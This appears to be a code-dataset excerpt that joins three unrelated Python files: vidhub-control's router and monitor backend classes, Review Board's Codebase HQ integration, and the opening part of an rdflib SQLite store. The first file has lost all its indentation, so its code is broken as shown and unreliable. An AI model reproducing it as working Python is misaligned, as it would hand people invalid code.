presets: The currently available (stored) ``list`` of :class:`Preset`
instances
:class:`pydispatch.properties.ListProperty`
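    Example (illustrative sketch; ``vidhub`` is assumed to be a connected instance
    of a concrete subclass)::
        # Route input index 3 to output index 0 (zero-based); the change is
        # written straight to the device (roughly equivalent to:
        # await vidhub.set_crosspoint(0, 3))
        vidhub.crosspoint_control[0] = 3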
"""
crosspoints: List[int] = ListProperty()
output_labels: List[str] = ListProperty()
input_labels: List[str] = ListProperty()
crosspoint_control: List[int] = ListProperty()
output_label_control: List[str] = ListProperty()
input_label_control: List[str] = ListProperty()
presets: List['Preset'] = ListProperty()
num_outputs: int = Property(0)
num_inputs: int = Property(0)
device_type: ClassVar[str] = 'vidhub'
feedback_prop_map = {
'crosspoints':'crosspoint_control',
'input_labels':'input_label_control',
'output_labels':'output_label_control',
}
_events_ = ['on_preset_added', 'on_preset_stored', 'on_preset_active']
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.bind(
num_outputs=self.on_num_outputs,
num_inputs=self.on_num_inputs,
output_labels=self.on_prop_feedback,
input_labels=self.on_prop_feedback,
crosspoints=self.on_prop_feedback,
output_label_control=self.on_prop_control,
input_label_control=self.on_prop_control,
crosspoint_control=self.on_prop_control,
)
presets = kwargs.get('presets', [])
for pst_data in presets:
pst_data['backend'] = self
preset = Preset(**pst_data)
self.presets.append(preset)
preset.bind(
on_preset_stored=self.on_preset_stored,
active=self.on_preset_active,
)
async def set_crosspoint(self, out_idx, in_idx):
"""Set a single crosspoint on the switcher
Arguments:
out_idx (int): The output to be set (zero-based)
in_idx (int): The input to switch the output (out_idx) to (zero-based)
"""
raise NotImplementedError()
async def set_crosspoints(self, *args):
"""Set multiple crosspoints in one method call
This is useful for setting many routing changes as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of output/input pairs to set. These should be given
as ``tuples`` of ``(out_idx, in_idx)`` as defined in
:meth:`~BackendBase.set_crosspoint`. They can be discontinuous
and unordered.
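        Example (illustrative; ``vidhub`` is a connected backend instance)::
            # Route input 5 to output 0 and input 2 to output 3 in one command
            await vidhub.set_crosspoints((0, 5), (3, 2))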
"""
raise NotImplementedError()
async def set_output_label(self, out_idx, label):
"""Set the label (name) of an output
Arguments:
out_idx (int): The output to be set (zero-based)
label (str): The label for the output
"""
raise NotImplementedError()
async def set_output_labels(self, *args):
"""Set multiple output labels in one method call
This is useful for setting many labels as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of output/label pairs to set. These should be given
as ``tuples`` of ``(out_idx, label)`` as defined in
:meth:`~BackendBase.set_output_label`. They can be discontinuous
and unordered.
"""
raise NotImplementedError()
async def set_input_label(self, in_idx, label):
"""Set the label (name) of an input
Arguments:
in_idx (int): The input to be set (zero-based)
label (str): The label for the input
"""
raise NotImplementedError()
async def set_input_labels(self, *args):
"""Set multiple input labels in one method call
This is useful for setting many labels as it reduces the number
of commands sent to the switcher.
Arguments:
*args: Any number of input/label pairs to set. These should be given
as ``tuples`` of ``(in_idx, label)`` as defined in
:meth:`~BackendBase.set_input_label`. They can be discontinuous
and unordered.
"""
raise NotImplementedError()
async def add_preset(self, name=None):
"""Adds a new :class:`Preset` instance
This method is used internally and should not normally be called outside
of this module. Instead, see :meth:`~BackendBase.store_preset`
"""
index = len(self.presets)
preset = Preset(backend=self, name=name, index=index)
self.presets.append(preset)
preset.bind(
on_preset_stored=self.on_preset_stored,
active=self.on_preset_active,
)
self.emit('on_preset_added', backend=self, preset=preset)
return preset
async def store_preset(self, outputs_to_store=None, name=None, index=None, clear_current=True):
"""Store the current switcher state to a :class:`Preset`
Arguments:
outputs_to_store (optional): An iterable of the output numbers
(zero-based) that should be saved in the preset. If given, only
these outputs will be recorded and when recalled, any output
not in this argument will be unchanged. If not given or ``None``,
all outputs will be recorded.
name (optional): The name to be given to the preset. If not provided
or ``None`` the preset will be given a name based off of its index.
index (optional): The index for the preset. If given and the preset
exists in the :attr:`~BackendBase.presets` list, that preset
will be updated. If there is no preset found with the index,
a new one will be created. If not given or ``None``, the next
available index will be used and a new preset will be created.
clear_current (bool): If ``True``, any previously existing data will
be removed from the preset (if it exists). If ``False``, the
data (if existing) will be merged with the current switcher state.
Default is ``True``
Returns:
The :class:`Preset` instance that was created or updated
This method is a ``coroutine``
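        Example (illustrative; ``vidhub`` is a connected backend instance)::
            # Save the current routes of outputs 0-3 as a new preset named "Cams"
            preset = await vidhub.store_preset(outputs_to_store=range(4), name='Cams')
            # ...later, restore those routes on the switcher
            await preset.recall()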
"""
if index is None:
preset = await self.add_preset()
else:
while True:
try:
preset = self.presets[index]
except IndexError:
preset = None
if preset is not None:
break
preset = await self.add_preset()
if name is not None:
preset.name = name
await preset.store(outputs_to_store, clear_current)
return preset
def on_preset_stored(self, *args, **kwargs):
kwargs['backend'] = self
self.emit('on_preset_stored', *args, **kwargs)
def on_preset_active(self, instance, value, **kwargs):
self.emit('on_preset_active', backend=self, preset=instance, value=value)
def on_num_outputs(self, instance, value, **kwargs):
if value == len(self.output_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.output_labels = [''] * value
def on_num_inputs(self, instance, value, **kwargs):
if value == len(self.input_labels):
return
if value != len(self.crosspoints):
self.crosspoints = [0] * value
self.input_labels = [''] * value
def on_prop_feedback(self, instance, value, **kwargs):
prop = kwargs.get('property')
if prop.name not in self.feedback_prop_map:
return
elock = self.emission_lock(prop.name)
control_prop = self.feedback_prop_map[prop.name]
setattr(self, control_prop, value[:])
def on_prop_control(self, instance, value, **kwargs):
if not self.prelude_parsed or not self.connection_state.is_connected:
return
prop = kwargs.get('property')
keys = kwargs.get('keys')
if keys is None:
keys = range(len(value))
feedback_prop = '{}s'.format(prop.name.split('_control')[0])
elock = self.emission_lock(feedback_prop)
if elock.held:
return
## TODO: This is an internal implementation in python-dispatch and
## is subject to future changes.
aio_lock = elock.aio_locks.get(id(self.event_loop))
if aio_lock is not None and aio_lock.locked():
return
if value == getattr(self, feedback_prop):
return
coro_name = '_'.join(['set', feedback_prop])
coro = getattr(self, coro_name)
args = [(key, value[key]) for key in keys]
tx_fut = asyncio.run_coroutine_threadsafe(coro(*args), loop=self.event_loop)
class SmartViewBackendBase(BackendBase):
"""Base class for SmartView devices
Attributes:
num_monitors: Number of physical monitors as reported by the device
inverted: ``True`` if the device has been mounted in an inverted
configuration (to optimize viewing angle).
monitors: A ``list`` containing instances of :class:`SmartViewMonitor`
or :class:`SmartScopeMonitor`, depending on device type.
:Events:
.. function:: on_monitor_property_change(self: SmartViewBackendBase, name: str, value: Any, monitor: SmartViewMonitor = monitor)
Dispatched when any :class:`~pydispatch.properties.Property`
value changes. The event signature for callbacks is
``(smartview_device, property_name, value, **kwargs)`` containing
a keyword argument "monitor" containing the :class:`SmartViewMonitor`
instance.
"""
num_monitors: Optional[int] = Property()
inverted: bool = Property(False)
monitors: List['SmartViewMonitor'] = ListProperty()
monitor_cls: ClassVar[type] = None
device_type: ClassVar[str] = 'smartview'
_events_ = ['on_monitor_property_change']
def __init__(self, **kwargs):
self.bind(monitors=self._on_monitors)
super().__init__(**kwargs)
async def set_monitor_property(self, monitor, name, value):
"""Set a property value for the given :class:`SmartViewMonitor` instance
Arguments:
monitor: The :class:`SmartViewMonitor` instance to set
name (str): Property name
value: The new value to set
This method is a coroutine.
"""
raise NotImplementedError()
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartViewMonitor
return cls
async def add_monitor(self, **kwargs):
cls = self.get_monitor_cls()
kwargs.setdefault('parent', self)
kwargs.setdefault('index', len(self.monitors))
monitor = cls(**kwargs)
monitor.bind(on_property_change=self.on_monitor_prop)
self.monitors.append(monitor)
return monitor
def on_monitor_prop(self, instance, name, value, **kwargs):
kwargs['monitor'] = instance
self.emit('on_monitor_property_change', self, name, value, **kwargs)
def _on_monitors(self, *args, **kwargs):
self.num_monitors = len(self.monitors)
class SmartScopeBackendBase(SmartViewBackendBase):
device_type: ClassVar[str] = 'smartscope'
def get_monitor_cls(self):
cls = self.monitor_cls
if cls is None:
cls = SmartScopeMonitor
return cls
MONITOR_PROPERTY_MAP = {k:k.title() for k in [
'brightness', 'contrast', 'saturation', 'identify', 'border']}
MONITOR_PROPERTY_MAP.update({
'widescreen_sd':'WidescreenSD',
'audio_channel':'AudioChannel',
'scope_mode':'ScopeMode',
})
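# Illustrative result: the map translates Python-side property names such as
# 'brightness' -> 'Brightness' and 'scope_mode' -> 'ScopeMode', presumably the
# parameter names expected by the device protocol handled in the concrete backends.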
class SmartViewMonitor(Dispatcher):
"""A single instance of a monitor within a SmartView device
Attributes:
index: Index of the monitor (zero-based)
name: The name of the monitor (can be user-defined)
brightness: The brightness value of the monitor (0-255)
contrast: The contrast value of the monitor (0-255)
saturation: The saturation value of the monitor (0-255)
widescreen_sd: Aspect ratio setting for SD format. Choices can be:
``True`` (stretching enabled), ``False`` (pillar-box), or
``None`` (auto-detect).
identify: If set to ``True``, the monitor's border will be white
for a brief duration to physically locate the device.
border: Sets the border of the monitor to the given color. Choices
are: 'red', 'green', 'blue', 'white', or ``None``.
audio_channel: The audio channel pair (Embedded in the SDI input)
used when :attr:`scope_mode` is set to audio monitoring.
Values are from 0 to 7 (0 == Channels 1&2, etc).
"""
index: int = Property()
name: str = Property()
brightness: int = Property()
contrast: int = Property()
saturation: int = Property()
widescreen_sd: Optional[bool] = Property()
identify: bool = Property(False)
border: Optional[str] = Property()
audio_channel: int = Property()
class PropertyChoices():
widescreen_sd = {
True:'ON',
False:'OFF',
None:'auto',
}
border = {
'red':'red',
'green':'green',
'blue':'blue',
'white':'white',
None:'NONE',
}
identify = {
True:'true',
False:'false',
}
_bind_properties = [
'brightness', 'contrast', 'saturation',
'widescreen_sd', 'identify', 'border', 'audio_channel',
]
_events_ = ['on_property_change']
def __init__(self, **kwargs):
self._property_locks = {}
self.parent = kwargs.get('parent')
self.event_loop = self.parent.event_loop
self.index = kwargs.get('index')
self.name = kwargs.get('name')
props = self.PropertyChoices._bind_properties
for prop in props:
value = kwargs.get(prop)
value = self.get_property_for_choice(prop, value)
setattr(self, prop, value)
self.bind(**{prop:self.on_prop_control for prop in props})
def _get_property_lock(self, name):
lock = self._property_locks.get(name)
if lock is None:
lock = asyncio.Lock()
self._property_locks[name] = lock
return lock
async def set_property_from_backend(self, name, value):
value = self.get_property_for_choice(name, value)
lock = self._get_property_lock(name)
async with lock:
setattr(self, name, value)
self.emit('on_property_change', self, name, value)
async def set_property(self, name, value):
await self.parent.set_monitor_property(self, name, value)
async def flash(self):
await self.set_property('identify', True)
def get_property_choices(self, name):
return getattr(self.PropertyChoices, name, None)
def get_choice_for_property(self, name, value):
choices = self.get_property_choices(name)
if choices is not None:
if value in choices:
value = choices[value]
return value
def get_property_for_choice(self, name, value):
choices = self.get_property_choices(name)
if choices is not None:
if value in choices.values():
for k, v in choices.items():
if v == value:
value = k
break
if isinstance(value, str) and value.lower() in ('none', 'true', 'false'):
if value.lower() == 'none':
value = None
else:
value = value.lower() == 'true'
return value
def on_prop_control(self, instance, value, **kwargs):
prop = kwargs.get('property')
lock = self._get_property_lock(prop.name)
if lock.locked():
return
value = self.get_choice_for_property(prop.name, value)
fut = self.set_property(prop.name, value)
asyncio.run_coroutine_threadsafe(fut, loop=self.event_loop)
class SmartScopeMonitor(SmartViewMonitor):
"""A single instance of a monitor within a SmartScope device
Attributes:
scope_mode: The type of scope to display. Choices are:
'audio_dbfs', 'audio_dbvu', 'histogram', 'parade_rgb', 'parade_yuv',
'video', 'vector_100', 'vector_75', 'waveform'.
"""
scope_mode: str = Property()
class PropertyChoices(SmartViewMonitor.PropertyChoices):
scope_mode = {
'audio_dbfs':'AudioDbfs',
'audio_dbvu':'AudioDbvu',
'histogram':'Histogram',
'parade_rgb':'ParadeRGB',
'parade_yuv':'ParadeYUV',
'video':'Picture',
'vector_100':'Vector100',
'vector_75':'Vector75',
'waveform':'WaveformLuma',
}
_bind_properties = SmartViewMonitor.PropertyChoices._bind_properties + [
'scope_mode',
]
class Preset(Dispatcher):
"""Stores and recalls routing information
Attributes:
name: The name of the preset.
This is a :class:`pydispatch.Property`
index: The index of the preset as it is stored in the
:attr:`~BackendBase.presets` container.
crosspoints: The crosspoints that this preset has stored.
This is a :class:`~pydispatch.properties.DictProperty`
active: A flag indicating whether all of the crosspoints stored
in this preset are currently active on the switcher.
This is a :class:`pydispatch.Property`
:Events:
.. function:: on_preset_stored(preset: Preset = self)
Dispatched after the preset stores its state.
"""
name: str = Property()
index: int = Property()
crosspoints: Dict[int, int] = DictProperty()
active: bool = Property(False)
_events_ = ['on_preset_stored']
def __init__(self, **kwargs):
self.backend = kwargs.get('backend')
self.index = kwargs.get('index')
name = kwargs.get('name')
if name is None:
name = 'Preset {}'.format(self.index + 1)
self.name = name
self.crosspoints = kwargs.get('crosspoints', {})
if self.backend.connection_state.is_connected and self.backend.prelude_parsed:
self.check_active()
else:
self.backend.bind(prelude_parsed=self.on_backend_ready)
self.backend.bind(crosspoints=self.on_backend_crosspoints)
self.bind(crosspoints=self.on_preset_crosspoints)
async def store(self, outputs_to_store=None, clear_current=True):
if outputs_to_store is None:
outputs_to_store = range(self.backend.num_outputs)
if clear_current:
self.crosspoints = {}
async with self.emission_lock('crosspoints'):
for out_idx in outputs_to_store:
self.crosspoints[out_idx] = self.backend.crosspoints[out_idx]
self.active = True
self.emit('on_preset_stored', preset=self)
async def recall(self):
if not len(self.crosspoints):
return
args = [(i, v) for i, v in self.crosspoints.items()]
await self.backend.set_crosspoints(*args)
def check_active(self):
if not len(self.crosspoints):
self.active = False
return
for out_idx, in_idx in self.crosspoints.items():
in_idx = self.crosspoints[out_idx]
if self.backend.crosspoints[out_idx] != in_idx:
self.active = False
return
self.active = True
def on_backend_ready(self, instance, value, **kwargs):
if not value:
return
self.backend.unbind(self.on_backend_ready)
self.check_active()
def on_backend_crosspoints(self, instance, value, **kwargs):
if not self.backend.prelude_parsed:
return
self.check_active()
def on_preset_crosspoints(self, instance, value, **kwargs):
if not len(self.crosspoints) or not self.backend.prelude_parsed:
return
self.check_active()
|
nocarryr/vidhub-control
|
vidhubcontrol/backends/base.py
|
Python
|
gpl-3.0
| 27,623 | 0.004236 |
from __future__ import unicode_literals
import logging
from xml.dom.minidom import parseString
from django import forms
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.translation import ugettext_lazy as _, ugettext
from reviewboard.hostingsvcs.errors import (AuthorizationError,
HostingServiceAPIError,
RepositoryError)
from reviewboard.hostingsvcs.forms import (HostingServiceAuthForm,
HostingServiceForm)
from reviewboard.hostingsvcs.service import (HostingService,
HostingServiceClient)
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.errors import FileNotFoundError
class CodebaseHQAuthForm(HostingServiceAuthForm):
api_key = forms.CharField(
label=_('API key'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The API key provided to your Codebase account. This is '
'available in My Profile under API Credentials.'))
domain = forms.CharField(
label=_('Codebase domain'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The subdomain used to access your Codebase account. '
'This is the "<tt>subdomain</tt>" of '
'<tt>subdomain</tt>.codebasehq.com.'))
def get_credentials(self):
credentials = super(CodebaseHQAuthForm, self).get_credentials()
credentials.update({
'domain': self.cleaned_data['domain'],
'api_key': self.cleaned_data['api_key'],
})
return credentials
class Meta(object):
help_texts = {
'hosting_account_username': _(
'The username you use to log into Codebase. This should '
'<em>not</em> include the domain name.'
),
'hosting_account_password': _(
'The password you use to log into Codebase. This is separate '
'from the API key below.'
),
}
class CodebaseHQForm(HostingServiceForm):
codebasehq_project_name = forms.CharField(
label=_('Project name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}))
codebasehq_repo_name = forms.CharField(
label=_('Repository short name'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The short name of your repository. This can be found by '
'clicking the Settings button on the right-hand '
'side of the repository browser.'))
class CodebaseHQClient(HostingServiceClient):
"""Client for talking to the Codebase API.
This implements the API methods that the hosting service needs, converting
requests into API calls and those back into structured results.
"""
#: Mimetype used for API requests and responses.
API_MIMETYPE = 'application/xml'
def __init__(self, hosting_service):
"""Initialize the client.
Args:
hosting_service (CodebaseHQ):
The hosting service that owns this client.
"""
self.hosting_service = hosting_service
def api_get_file(self, repository, project_name, repo_name, path,
revision):
"""Return the content of a file in a repository.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository entry in Review Board.
project_name (unicode):
The name of the Codebase project.
repo_name (unicode):
The name of the repository.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file or commit.
Returns:
bytes:
The contents of the file.
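        For example (illustrative): for a Git repository the request resolves to
        ``https://api3.codebasehq.com/<project>/<repo>/blob/<revision>``, while other
        SCM types append the file path after the revision.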
"""
url = '%s/%s/blob/' % (project_name, repo_name)
if repository.tool.name == 'Git':
url += revision
else:
if path.startswith('/'):
path = path[1:]
url += '%s/%s' % (revision, path)
return self.api_get(self.build_api_url(url), raw_content=True)
def api_get_public_keys(self, username):
"""Return information on all public keys for a user.
Args:
username (unicode):
The user to fetch public keys for.
Returns:
dict:
Information on each of the user's public keys.
"""
return self.api_get(self.build_api_url('users/%s/public_keys'
% username))
def api_get_repository(self, project_name, repo_name):
"""Return information on a repository.
Args:
project_name (unicode):
The name of the Codebase project.
repo_name (unicode):
The name of the repository.
Returns:
dict:
Information on the repository.
See https://support.codebasehq.com/kb/repositories for the
data returned.
"""
return self.api_get(
self.build_api_url('%s/%s' % (project_name, repo_name)))
def build_api_url(self, url):
"""Return the URL for an API call.
Args:
url (unicode):
The relative URL for the API call.
Returns:
unicode:
The absolute URL for the API call.
"""
return 'https://api3.codebasehq.com/%s' % url
def api_get(self, url, raw_content=False):
"""Perform an HTTP GET request to the API.
Args:
url (unicode):
The full URL to the API resource.
raw_content (bool, optional):
If set to ``True``, the raw content of the result will be
returned, instead of a parsed XML result.
Returns:
object:
The parsed content of the result, as a dictionary, or the raw
bytes content if ``raw_content`` is ``True``.
"""
hosting_service = self.hosting_service
try:
account_data = hosting_service.account.data
api_username = '%s/%s' % (account_data['domain'],
hosting_service.account.username)
api_key = decrypt_password(account_data['api_key'])
data, headers = self.http_get(
url,
username=api_username,
password=api_key,
headers={
'Accept': self.API_MIMETYPE,
})
if raw_content:
return data
else:
return self.parse_xml(data)
except HTTPError as e:
data = e.read()
msg = six.text_type(e)
rsp = self.parse_xml(data)
if rsp and 'errors' in rsp:
errors = rsp['errors']
if 'error' in errors:
msg = errors['error']
if e.code == 401:
raise AuthorizationError(msg)
else:
raise HostingServiceAPIError(msg, http_code=e.code, rsp=rsp)
except URLError as e:
raise HostingServiceAPIError(e.reason)
def get_xml_text(self, nodes):
"""Return the text contents of a set of XML nodes.
Args:
nodes (list of xml.dom.minidom.Element):
The list of nodes.
Returns:
unicode:
The text content of the nodes.
"""
return ''.join(
node.data
for node in nodes
if node.nodeType == node.TEXT_NODE
)
def parse_xml(self, s):
"""Return the parsed content for an XML document.
Args:
s (unicode):
The XML document as a string.
Returns:
dict:
The parsed content of the XML document, with each key
being a dictionary of other parsed content.
If the document cannot be parsed, this will return ``None``.
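        For example (illustrative), parsing
        ``<repository><name>demo</name></repository>`` yields
        ``{'repository': {'name': 'demo'}}``.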
"""
try:
doc = parseString(s)
except:
return None
root = doc.documentElement
return {
root.tagName: self._parse_xml_node(root),
}
def _parse_xml_node(self, node):
"""Return the parsed content for a node in an XML document.
This parses the content of a Codebase XML document, turning it into
arrays, strings, and dictionaries of data.
Args:
node (xml.dom.minidom.Element):
The node being parsed.
Returns:
object:
The parsed content of the node, based on the type of node being
processed.
"""
node_type = node.getAttribute('type')
is_nil = node.getAttribute('nil')
if node_type == 'array':
result = [
self._parse_xml_node(child)
for child in node.childNodes
if child.nodeType == child.ELEMENT_NODE
]
elif is_nil == 'true':
result = None
else:
child_nodes = [
child
for child in node.childNodes
if child.nodeType == child.ELEMENT_NODE
]
if child_nodes:
result = dict([
(child.tagName, self._parse_xml_node(child))
for child in child_nodes
])
else:
result = self.get_xml_text(node.childNodes)
return result
class CodebaseHQ(HostingService):
"""Repository hosting support for Codebase.
Codebase is a repository hosting service that supports Subversion, Git,
and Mercurial. It's available at https://codebasehq.com.
This integration provides repository validation and file fetching. Due to
API limitations, it does not support post-commit review at this time.
"""
name = 'Codebase HQ'
form = CodebaseHQForm
auth_form = CodebaseHQAuthForm
needs_authorization = True
supports_bug_trackers = True
supports_repositories = True
supported_scmtools = ['Git', 'Subversion', 'Mercurial']
repository_fields = {
'Git': {
'path': '[email protected]:%(domain)s/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.git',
},
'Subversion': {
'path': 'https://%(domain)s.codebasehq.com/'
'%(codebasehq_project_name)s/'
'%(codebasehq_repo_name)s.svn',
},
'Mercurial': {
'path': 'https://%(domain)s.codebasehq.com/'
'projects/%(codebasehq_project_name)s/repositories/'
'%(codebasehq_repo_name)s/',
},
}
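    # Illustrative example (hypothetical names): with domain 'myteam', project 'proj'
    # and repository 'code', the Git path template above expands to
    # '[email protected]:myteam/proj/code.git'.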
bug_tracker_field = (
'https://%(domain)s.codebasehq.com/projects/'
'%(codebasehq_project_name)s/tickets/%%s'
)
#: A mapping of Codebase SCM types to SCMTool names.
REPO_SCM_TOOL_MAP = {
'git': 'Git',
'svn': 'Subversion',
'hg': 'Mercurial',
}
def __init__(self, *args, **kwargs):
"""Initialize the hosting service.
Args:
*args (tuple):
Positional arguments for the parent constructor.
**kwargs (dict):
Keyword arguments for the parent constructor.
"""
super(CodebaseHQ, self).__init__(*args, **kwargs)
self.client = CodebaseHQClient(self)
def authorize(self, username, password, credentials, *args, **kwargs):
"""Authorize an account for Codebase.
        Codebase uses HTTP Basic Auth with an API username (consisting of the
Codebase team's domain and the account username) and an API key (for
the password) for API calls, and a standard username/password for
Subversion repository access. We need to store all of this.
Args:
username (unicode):
The username to authorize.
password (unicode):
The API token used as a password.
credentials (dict):
Additional credentials from the authentication form.
*args (tuple):
Extra unused positional arguments.
**kwargs (dict):
Extra unused keyword arguments.
Raises:
reviewboard.hostingsvcs.errors.AuthorizationError:
The credentials provided were not valid.
"""
self.account.data.update({
'domain': credentials['domain'],
'api_key': encrypt_password(credentials['api_key']),
'password': encrypt_password(password),
})
# Test the account to make sure the credentials are fine. Note that
# we can only really sanity-check the API token, domain, and username
        # from here. There's no good way to check the actual password,
# which we only use for Subversion repositories.
#
# This will raise a suitable error message if authorization fails.
try:
self.client.api_get_public_keys(username)
except AuthorizationError:
raise AuthorizationError(
ugettext('One or more of the credentials provided were not '
'accepted by Codebase.'))
self.account.save()
def is_authorized(self):
"""Return if the account has been authorized.
This checks if all the modern authentication details are stored along
with the account.
Returns:
bool:
``True`` if all required credentials are set for the account.
"""
return (self.account.data.get('api_key') is not None and
self.account.data.get('password') is not None and
self.account.data.get('domain') is not None)
def get_password(self):
"""Return the password for this account.
This is used primarily for Subversion repositories, so that direct
access can be performed in order to fetch properties and other
information.
This does not return the API key.
Returns:
unicode:
The account password for repository access.
"""
return decrypt_password(self.account.data['password'])
def check_repository(self, codebasehq_project_name=None,
codebasehq_repo_name=None, tool_name=None,
*args, **kwargs):
"""Check the validity of a repository.
This will perform an API request against Codebase to get information on
the repository. This will throw an exception if the repository was not
found, and return cleanly if it was found.
Args:
            codebasehq_project_name (unicode):
The name of the project on Codebase.
codebasehq_repo_name (unicode):
The name of the repository on Codebase.
tool_name (unicode):
The name of the SCMTool for the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Raises:
reviewboard.hostingsvcs.errors.RepositoryError:
The repository was not found.
"""
# The form should enforce these values.
assert codebasehq_project_name
assert codebasehq_repo_name
assert tool_name
try:
info = self.client.api_get_repository(codebasehq_project_name,
codebasehq_repo_name)
except HostingServiceAPIError as e:
logging.error('Error finding Codebase repository "%s" for '
'project "%s": %s',
codebasehq_repo_name, codebasehq_project_name,
e)
raise RepositoryError(
ugettext('A repository with this name and project was '
'not found.'))
try:
scm_type = info['repository']['scm']
except KeyError:
logging.error('Missing "scm" field for Codebase HQ repository '
'payload: %r',
info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
try:
expected_tool_name = self.REPO_SCM_TOOL_MAP[scm_type]
except KeyError:
logging.error('Unexpected "scm" value "%s" for Codebase HQ '
'repository, using payload: %r',
scm_type, info)
raise RepositoryError(
ugettext('Unable to determine the type of repository '
'from the Codebase API. Please report this.'))
if expected_tool_name != tool_name:
raise RepositoryError(
ugettext("The repository type doesn't match what you "
"selected. Did you mean %s?")
% expected_tool_name)
def get_file(self, repository, path, revision, *args, **kwargs):
"""Returns the content of a file in a repository.
This will perform an API request to fetch the contents of a file.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository containing the file.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file in the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Returns:
            bytes:
The content of the file in the repository.
"""
try:
return self.client.api_get_file(
repository,
repository.extra_data['codebasehq_project_name'],
repository.extra_data['codebasehq_repo_name'],
path, revision)
except HostingServiceAPIError as e:
if e.http_code == 404:
raise FileNotFoundError(path, revision)
else:
logging.warning('Failed to fetch file from Codebase HQ '
'repository %s: %s',
repository, e)
raise
def get_file_exists(self, repository, path, revision, *args, **kwargs):
"""Returns whether a given file exists.
This will perform an API request to fetch the contents of a file,
returning ``True`` if the content could be fetched.
Args:
repository (reviewboard.scmtools.models.Repository):
The repository containing the file.
path (unicode):
The path to the file in the repository.
revision (unicode):
The revision of the file in the repository.
*args (tuple):
Extra unused positional arguments passed to this function.
**kwargs (dict):
Extra unused keyword arguments passed to this function.
Returns:
bool:
``True`` if the file exists in the repository.
"""
try:
self.client.api_get_file(
repository,
repository.extra_data['codebasehq_project_name'],
repository.extra_data['codebasehq_repo_name'],
path, revision)
return True
except HostingServiceAPIError:
return False
|
davidt/reviewboard
|
reviewboard/hostingsvcs/codebasehq.py
|
Python
|
mit
| 20,408 | 0.000049 |
from __future__ import generators
from rdflib import BNode
from rdflib.Literal import Literal
from pprint import pprint
from pysqlite2 import dbapi2
import sha,sys,re,os
from rdflib.term_utils import *
from rdflib.Graph import QuotedGraph
from rdflib.store.REGEXMatching import REGEXTerm, NATIVE_REGEX, PYTHON_REGEX
from rdflib.store.AbstractSQLStore import *
Any = None
#User-defined REGEXP operator
def regexp(expr, item):
r = re.compile(expr)
return r.match(item) is not None
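#Example (illustrative): after this function is registered on a connection with
#create_function("regexp", 2, regexp), SQL such as
#"SELECT ... WHERE subject REGEXP '^http://example'" dispatches to it.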
class SQLite(AbstractSQLStore):
"""
    SQLite store formula-aware implementation. It stores its triples in the following partitions:
- Asserted non rdf:type statements
- Asserted rdf:type statements (in a table which models Class membership)
The motivation for this partition is primarily query speed and scalability as most graphs will always have more rdf:type statements than others
- All Quoted statements
    In addition it persists namespace mappings in a separate table
"""
context_aware = True
formula_aware = True
transaction_aware = True
regex_matching = PYTHON_REGEX
autocommit_default = False
def open(self, home, create=True):
"""
Opens the store specified by the configuration string. If
create is True a store will be created if it does not already
exist. If create is False and a store does not already exist
an exception is raised. An exception is also raised if a store
exists, but there is insufficient permissions to open the
store."""
if create:
db = dbapi2.connect(os.path.join(home,self.identifier))
c=db.cursor()
c.execute(CREATE_ASSERTED_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_ASSERTED_TYPE_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_QUOTED_STATEMENTS_TABLE%(self._internedId))
c.execute(CREATE_NS_BINDS_TABLE%(self._internedId))
c.execute(CREATE_LITERAL_STATEMENTS_TABLE%(self._internedId))
for tblName,indices in [
(
"%s_asserted_statements",
[
("%s_A_termComb_index",('termComb',)),
("%s_A_s_index",('subject',)),
("%s_A_p_index",('predicate',)),
("%s_A_o_index",('object',)),
("%s_A_c_index",('context',)),
],
),
(
"%s_type_statements",
[
("%s_T_termComb_index",('termComb',)),
("%s_member_index",('member',)),
("%s_klass_index",('klass',)),
("%s_c_index",('context',)),
],
),
(
"%s_literal_statements",
[
("%s_L_termComb_index",('termComb',)),
("%s_L_s_index",('subject',)),
("%s_L_p_index",('predicate',)),
("%s_L_c_index",('context',)),
],
),
(
"%s_quoted_statements",
[
("%s_Q_termComb_index",('termComb',)),
("%s_Q_s_index",('subject',)),
("%s_Q_p_index",('predicate',)),
("%s_Q_o_index",('object',)),
("%s_Q_c_index",('context',)),
],
),
(
"%s_namespace_binds",
[
("%s_uri_index",('uri',)),
],
)]:
for indexName,columns in indices:
c.execute("CREATE INDEX %s on %s (%s)"%(indexName%self._internedId,tblName%(self._internedId),','.join(columns)))
c.close()
db.commit()
db.close()
self._db = dbapi2.connect(os.path.join(home,self.identifier))
self._db.create_function("regexp", 2, regexp)
if os.path.exists(os.path.join(home,self.identifier)):
c = self._db.cursor()
c.execute("SELECT * FROM sqlite_master WHERE type='table'")
tbls = [rt[1] for rt in c.fetchall()]
c.close()
for tn in [tbl%(self._internedId) for tbl in table_name_prefixes]:
if tn not in tbls:
sys.stderr.write("table %s Doesn't exist\n" % (tn));
#The database exists, but one of the partitions doesn't exist
return 0
#Everything is there (the database and the partitions)
return 1
#The database doesn't exist - nothing is there
#return -1
def destroy(self, home):
"""
FIXME: Add documentation
"""
db = dbapi2.connect(os.path.join(home,self.identifier))
c=db.cursor()
for tblsuffix in table_name_prefixes:
try:
c.execute('DROP table %s'%tblsuffix%(self._internedId))
except:
print "unable to drop table: %s"%(tblsuffix%(self._internedId))
